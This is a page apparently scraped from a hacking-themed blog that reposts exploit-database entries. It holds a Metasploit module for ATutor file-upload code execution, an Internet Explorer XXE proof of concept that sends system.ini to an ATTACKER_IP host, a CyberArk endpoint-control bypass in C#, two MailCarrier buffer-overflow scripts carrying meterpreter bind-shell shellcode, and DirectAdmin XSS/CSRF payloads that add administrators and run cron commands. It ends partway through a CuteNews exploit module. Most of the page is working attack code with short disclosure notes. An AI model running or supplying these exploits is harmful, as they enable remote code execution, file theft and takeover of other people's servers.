##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ATutor < 2.2.4 'file_manager' Remote Code Execution",
'Description' => %q{
This module allows the user to run commands on the server with teacher user privilege.
The 'Upload files' section in the 'File Manager' field contains arbitrary file upload vulnerability.
The "$IllegalExtensions" function has control weakness and shortcomings.
It is possible to see illegal extensions within "constants.inc.php". (exe|asp|php|php3|php5|cgi|bat...)
However, there is no case-sensitive control. Therefore, it is possible to bypass control with filenames such as ".phP", ".Php"
It can also be used in dangerous extensions such as "shtml" and "phtml".
The directory path for the "content" folder is located at "config.inc.php".
For the exploit to work, the "define ('AT_CONTENT_DIR', 'address')" content folder must be located in the web home directory or the address must be known.
This exploit creates a course with the teacher user and loads the malicious php file into server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & MSF Module
],
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'http://pentest.com.tr/exploits/ATutor-2-2-4-file-manager-Remote-Code-Execution-Injection-Metasploit.html' ],
[ 'URL', 'https://atutor.github.io/' ],
[ 'URL', 'http://www.atutor.ca/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '09 April 2019',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [true, 'The Teacher Username to authenticate as']),
OptString.new('PASSWORD', [true, 'The Teacher password to authenticate with']),
OptString.new('CONTENT_DIR', [true, 'The content folder location', 'content'])
],self.class)
end
def exec_payload
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}", @course_id, "#{@fn}")
})
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}/")
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 404
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
##
# csrftoken read and create a new course
##
def create_course(cookie, check)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php"),
'headers' =>
{
'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
'cookie' => cookie,
},
'agent' => 'Mozilla'
})
if res && res.code == 200 && res.body =~ /Create Course: My Start Pag/
@token = res.body.split('csrftoken" value="')[1].split('"')[0]
else
return false
end
@course_name = Rex::Text.rand_text_alpha_lower(5)
post_data = Rex::MIME::Message.new
post_data.add_part(@token, nil, nil,'form-data; name="csrftoken"')
post_data.add_part('true', nil, nil, 'form-data; name="form_course"')
post_data.add_part(@course_name, nil, nil, 'form-data; name="title"')
post_data.add_part('top', nil, nil, 'form-data; name="content_packaging"')
post_data.add_part('protected', nil, nil, 'form-data; name="access"')
post_data.add_part('Save', nil, nil, 'form-data; name="submit"')
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php")
})
location = res.redirection.to_s
if res && res.code == 302 && location.include?('bounce.php?course')
@course_id = location.split('course=')[1].split("&p")[0]
return true
else
return false
end
end
##
# Upload malicious file // payload integration
##
def upload_shell(cookie, check)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "bounce.php?course=" + @course_id),
'headers' =>
{
'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
'cookie' => cookie,
},
'agent' => 'Mozilla'
})
ucookie = "ATutorID=#{$2};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*);/
file_name = Rex::Text.rand_text_alpha_lower(8) + ".phP"
@fn = "#{file_name}"
post_data = Rex::MIME::Message.new
post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"uploadedfile\"; filename=\"#{file_name}\"")
post_data.add_part('Upload', nil, nil, 'form-data; name="submit"')
post_data.add_part('', nil, nil, 'form-data; name="pathext"')
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => ucookie,
'uri' => normalize_uri(target_uri.path, "mods", "_core", "file_manager", "upload.php")
})
if res && res.code == 302 && res.redirection.to_s.include?('index.php?pathext')
print_status("Trying to upload #{file_name}")
return true
else
print_status("Error occurred during uploading!")
return false
end
end
##
# Password encryption with csrftoken
##
def get_hashed_password(token, password, check)
if check
return Rex::Text.sha1(password + token)
else
return Rex::Text.sha1(Rex::Text.sha1(password) + token)
end
end
##
# User login operations
##
def login(username, password, check)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
})
token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
if check
password = get_hashed_password(token, password, true)
else
password = get_hashed_password(token, password, false)
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
return cookie
end
else res.redirection.to_s.include?('admin/index.php')
fail_with(Failure::NoAccess, 'The account is the administrator. Please use a teacher account!')
return cookie
end
end
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
return nil
end
##
# Exploit controls and information
##
def exploit
tcookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_good("Logged in as #{datastore['USERNAME']}")
if create_course(tcookie, true)
print_status("CSRF Token : " + @token)
print_status("Course Name : " + @course_name + " Course ID : " + @course_id)
print_good("New course successfully created.")
end
if upload_shell(tcookie, true)
print_good("Upload successfully.")
print_status("Trying to exec payload...")
exec_payload
end
end
end
##
# The end of the adventure (o_O) // AkkuS
##
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591928
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer v11
(latest version)
Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
[Vulnerability Type]
XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally.
This can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed
Program version information. Example, a request for "c:\Python27\NEWS.txt" can return version information for that program.
Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability.
However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised.
Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT file using malicious <xml> markup tags the user will get no such
active content or security bar warnings.
e.g.
C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -
Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2.
[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY
[Exploit/POC]
POC to exfil Windows "system.ini" file.
Note: Edit attacker server IP in the script to suit your needs.
1) Use below script to create the "datatears.xml" XML and XXE embedded "msie-xxe-0day.mht" MHT file.
2) python -m SimpleHTTPServer
3) Place the generated "datatears.xml" in Python server web-root.
4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.
#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
ATTACKER_IP="localhost"
PORT="8000"
mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
'This is a multi-part message in MIME format.\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'
'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">\n'
'<html>\n'
'<head>\n'
'<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
'<title>MSIE XXE 0day</title>\n'
'</head>\n'
'<body>\n'
'<xml>\n'
'<?xml version="1.0" encoding="utf-8"?>\n'
'<!DOCTYPE r [\n'
'<!ELEMENT r ANY >\n'
'<!ENTITY % sp SYSTEM "http://'+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
'%sp;\n'
'%param1;\n'
']>\n'
'<r>&exfil;</r>\n'
'<r>&exfil;</r>\n'
'<r>&exfil;</r>\n'
'<r>&exfil;</r>\n'
'</xml>\n'
'<script>window.print();</script>\n'
'<table cellpadding="0" cellspacing="0" border="0">\n'
'<tr>\n'
'<td class="contentcell-width">\n'
'<h1>MSIE XML External Entity 0day PoC.</h1>\n'
'<h3>Discovery: hyp3rlinx</h3>\n'
'<h3>ApparitionSec</h3>\n'
'</td>\n'
'</tr>\n'
'</table>\n'
'</body>\n'
'</html>\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
)
xml_file=(
'<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
'<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
)
def mk_msie_0day_filez(f,p):
f=open(f,"wb")
f.write(p)
f.close()
if __name__ == "__main__":
mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
mk_msie_0day_filez("datatears.xml",xml_file)
print "Microsoft Internet Explorer XML External Entity 0day PoC."
print "Files msie-xxe-0day.mht and datatears.xml Created!."
print "Discovery: Hyp3rlinx / Apparition Security"
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC reponse April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
April 10, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: CyberArk Endpoint bypass
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894
//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called “Application Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute
This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;
namespace raceagainstthesystem
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void btn_change_access_control_Click(object sender, EventArgs e)
{
string fileName = txt_filepath.Text;
FileSecurity fSecurity = File.GetAccessControl(fileName);
fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
FileSystemRights.ReadData, AccessControlType.Deny));
File.SetAccessControl(fileName, fSecurity);
/*
fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
FileSystemRights.ReadData, AccessControlType.Allow));
*/
File.SetAccessControl(fileName, fSecurity);
}
private void btn_choseFile_Click(object sender, System.EventArgs e)
{
OpenFileDialog choofdlog = new OpenFileDialog();
choofdlog.Filter = "All Files (*.*)|*.*";
choofdlog.FilterIndex = 1;
choofdlog.Multiselect = true;
string sFileName = "";
if (choofdlog.ShowDialog() == DialogResult.OK)
{
sFileName = choofdlog.FileName;
string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true
}
txt_filepath.Text = sFileName;
}
}
}
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
# Date: 12/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
#POC
#1.) Change ip and port in code
#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
"\x6f\x58\x55\x41\x41")
buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 25))
print s.recv(1024)
s.send('EHLO root@telspace.co.za \r\n')
print s.recv(1024)
s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
print s.recv(1024)
s.send('RCPT TO: '+ buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"
# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
# Date: 12.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# info@infinitumit.com.tr && infinitumit.com.tr
# Description:
# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by
# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover.
# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen:
# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more.
# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
# Example Payloads:
# Add Administrator:
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
l=test%40test.com&passwd=password&passwd2=password¬ify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Remote Command Execution by Cron Jobs:
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
var params =
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Edit File:
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Create FTP Account:
var url = "http://SERVERIP:2222/CMD_FTP";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
stom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
# POC
# 1.) Change ip and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
# Badchars \x00\xd9
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
"\x48\xf4\x91\x9b\x1b\x0b")
buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
'Description' => %q(
This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
The attacker can infiltrate the server through the avatar upload process in the profile area.
There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
Header content of the file can be changed and the control can be bypassed.
We can use the "GIF" header for this process.
An ordinary user is enough to exploit the vulnerability. No need for admin user.
The module creates a file for you and allows RCE.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
],
'References' =>
[
['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
['URL', 'http://cutephp.com'] # Official Website
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Apr 14 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
